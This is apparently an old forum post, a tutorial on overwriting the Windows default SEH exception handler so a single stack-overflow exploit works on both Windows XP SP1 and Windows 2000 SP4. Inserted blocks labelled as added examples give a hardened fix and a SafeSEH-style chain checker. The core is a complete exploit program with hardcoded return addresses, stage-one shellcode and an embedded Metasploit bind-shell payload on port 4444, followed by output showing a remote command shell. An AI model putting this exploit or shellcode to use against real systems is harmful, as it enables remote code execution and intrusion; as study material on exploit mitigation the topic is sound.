Exploiting Default Exception Handler to Increase Exploit Sta

Posted by 韩冰, 2004-11-19 10:39
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address, but in this case we will continue overwriting the stack and overwrite the default exception handler as well.

    [Buf]                 <- Shellcode
    [Return Address]      <- jmp register (for Windows XP SP1)
    [Various Stack Data]  <- Junk
    [Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
    [SE Handler]          <- jmp register (for Win2k SP4)
    [Stage1 Shellcode]    <- stage1 shellcode for Win2k

If the first return address (Windows XP SP1) is wrong, an exception will occur and the default exception handler will be called (Windows 2000 SP4). This allows us to create a stable exploit with two return addresses.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac

Vulnerable Code:

//lamebuf.c
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[]){
    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2){ return -1; }

    strcpy(buf, argv[1]); // unbounded copy of argv[1] into the 512-byte buf: the overflow
    return 0x0;
}

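For contrast, here is a hardened counterpart to lamebuf.c. It is an added example, not code from the post: copy_arg(), handle_arg() and probe_arg_length() are names chosen here, and the fix is simply to bound the copy and reject an argument that does not fit, instead of letting strcpy() run past buf[].

```c
/* lamebuf_fixed.c: added example, a hardened counterpart to the lamebuf.c
 * above (not part of the original post). The one change that matters is
 * that the unbounded strcpy() becomes a length check that rejects oversized
 * input instead of writing past buf[], so a 1600-byte argument can no longer
 * reach the saved return address or the SEH record above the frame. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 512   /* same size as lamebuf.c's buf[] */

/* Copy src into dst (capacity dstsz) only if it fits including its NUL.
 * Returns 0 on success, -1 on oversized or invalid input; dst is left
 * untouched on failure. The length scan stops at dstsz so an unterminated
 * source is never read past the capacity we care about. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n >= dstsz)              /* no room for the terminating NUL */
        return -1;
    memcpy(dst, src, n + 1);     /* bounded copy, NUL included */
    return 0;
}

/* Same frame shape as lamebuf.c's main(): a 512-byte local that receives
 * the argument. Returns 0 if accepted, -1 if rejected. */
int handle_arg(const char *arg)
{
    char buf[BUF_SIZE];
    return copy_arg(buf, sizeof buf, arg);
}

/* Test helper: build a constructed argument of `len` 'A' bytes (the post's
 * crash input was 1600 of them) and report how handle_arg() treats it. */
int probe_arg_length(size_t len)
{
    char *s = malloc(len + 1);
    int rc;
    if (s == NULL)
        return -1;
    memset(s, 'A', len);
    s[len] = '\0';
    rc = handle_arg(s);
    free(s);
    return rc;
}

int main(int argc, char *argv[])
{
    if (argc != 2)
        return -1;
    if (handle_arg(argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```

With this change the 1600-byte input used in the next section is refused and never touches the frame above buf[]. Rejecting, rather than silently truncating with strncpy(), also keeps the program from acting on a clipped argument.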
Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:

0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.

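Before moving on to the return addresses, here is what a dispatcher-side sanity check makes of an overwritten record like the one in the dump above. This is an added example, not code from the post or from any Windows source: it simulates a 32-bit stack in C and validates the SEH chain the way a hardened dispatcher can (record inside the stack and 4-byte aligned, chain ascending, handler not pointing into the stack, handler present in the module's table of registered handlers, which is the SafeSEH idea). The stack bounds, the DEFAULT_HANDLER address, the allow-list and all function names are assumptions; the 0x41414141 values, 0x0012FFB0 and 0x0012FF88 are taken from the dump above.

```c
/* seh_chain_check.c: added example, not part of the original post or any
 * OS source. It models, over a simulated 32-bit stack, the sanity checks
 * a SEH dispatcher can run on the registration-record chain before it
 * trusts a handler: the record must lie inside the stack and be 4-byte
 * aligned, the chain must ascend, the handler must not point into the
 * stack, and the handler must be one its module registered (the SafeSEH
 * idea). Stack bounds, the allow-list and DEFAULT_HANDLER are constructed
 * for the demo; 0x41414141, 0x0012FFB0 and 0x0012FF88 come from the dump. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SEH_END     0xFFFFFFFFu   /* end-of-chain marker in the Next field */
#define STACK_WORDS 64            /* size of the simulated stack in dwords */

/* Simulated stack: dword i lives at address limit + 4*i; base is one past
 * the highest valid address (like TEB StackLimit/StackBase). */
typedef struct {
    uint32_t limit;
    uint32_t base;
    uint32_t words[STACK_WORDS];
} sim_stack;

enum seh_status {
    SEH_OK = 0,
    SEH_RECORD_OUTSIDE_STACK,
    SEH_RECORD_MISALIGNED,
    SEH_CHAIN_NOT_ASCENDING,
    SEH_HANDLER_ON_STACK,
    SEH_HANDLER_NOT_REGISTERED
};

static int in_stack(const sim_stack *s, uint32_t addr, uint32_t size)
{
    return addr >= s->limit && addr + size > addr && addr + size <= s->base;
}

static uint32_t read_dword(const sim_stack *s, uint32_t addr)
{
    return s->words[(addr - s->limit) / 4];
}

/* Walk the chain from `head` (the fs:[0] value) and validate every
 * {Next, Handler} record. `allowed` is the model's SafeSEH table: the
 * handler addresses the loaded modules registered. */
enum seh_status seh_chain_check(const sim_stack *s, uint32_t head,
                                const uint32_t *allowed, size_t nallowed)
{
    uint32_t rec = head, prev = 0;
    while (rec != SEH_END) {
        if (!in_stack(s, rec, 8))          return SEH_RECORD_OUTSIDE_STACK;
        if (rec & 3)                       return SEH_RECORD_MISALIGNED;
        if (prev != 0 && rec <= prev)      return SEH_CHAIN_NOT_ASCENDING;
        uint32_t next    = read_dword(s, rec);
        uint32_t handler = read_dword(s, rec + 4);
        if (in_stack(s, handler, 1))       return SEH_HANDLER_ON_STACK;
        int registered = 0;
        for (size_t i = 0; i < nallowed; i++)
            if (allowed[i] == handler) registered = 1;
        if (!registered)                   return SEH_HANDLER_NOT_REGISTERED;
        prev = rec;
        rec  = next;
    }
    return SEH_OK;
}

/* Constructed address standing in for the process's default handler in ntdll. */
#define DEFAULT_HANDLER 0x77F5A000u

/* Scenarios: 0 = intact default record; 1 = the crash dump above, both
 * fields overwritten with 0x41414141; 2 = a handler that points back into
 * the stack (at the dump's ESP, 0x0012FF88). */
enum seh_status check_scenario(int scenario)
{
    sim_stack s;
    const uint32_t allowed[] = { DEFAULT_HANDLER };
    const uint32_t rec = 0x0012FFB0u;          /* default record, as in the dump */
    memset(&s, 0, sizeof s);
    s.limit = 0x0012FF00u;
    s.base  = s.limit + 4 * STACK_WORDS;       /* 0x00130000 */
    uint32_t i = (rec - s.limit) / 4;
    s.words[i]     = scenario == 1 ? 0x41414141u : SEH_END;
    s.words[i + 1] = scenario == 1 ? 0x41414141u
                   : scenario == 2 ? 0x0012FF88u : DEFAULT_HANDLER;
    return seh_chain_check(&s, rec, allowed, 1);
}

int main(void)
{
    static const char *names[] = {
        "ok", "record outside stack", "record misaligned",
        "chain not ascending", "handler on stack", "handler not registered" };
    for (int sc = 0; sc <= 2; sc++)
        printf("scenario %d: %s\n", sc, names[check_scenario(sc)]);
    return 0;
}
```

Scenario 1 is the dump above: the overwritten handler is not in the registered-handler table, so a dispatcher enforcing that check never calls it, and a handler aimed into the stack (scenario 2) is rejected even before that table is consulted. The technique in this post relies on the target's dispatcher not performing checks of this kind.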
Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that ESP points to user input, so we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

Proof Of Concept:

// exploit.c
// Tal zeltzer - [Double Return] //

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <process.h> // execve()

#define RET_XP 0x77F8AC16    // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc, char *argv[]){
    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf, 0x0, sizeof(buf));
    memset(buf, 0x90, 1652);
    memcpy(&buf[24], shellcode, sizeof(shellcode)-1);

    memcpy(&buf[1544], &stage1_1, sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
    memcpy(&buf[1592], &stage1_2, sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode

    *(unsigned long *)&buf[1540] = RET_XP;     // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
    *(unsigned long *)&buf[1588] = RET_WIN2K;  // Second RET (jmp ebx) win2k sp4 en

    bufExe[1] = buf;
    //Execute the vulnerable application
    execve(bufExe[0], bufExe, NULL);

    return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.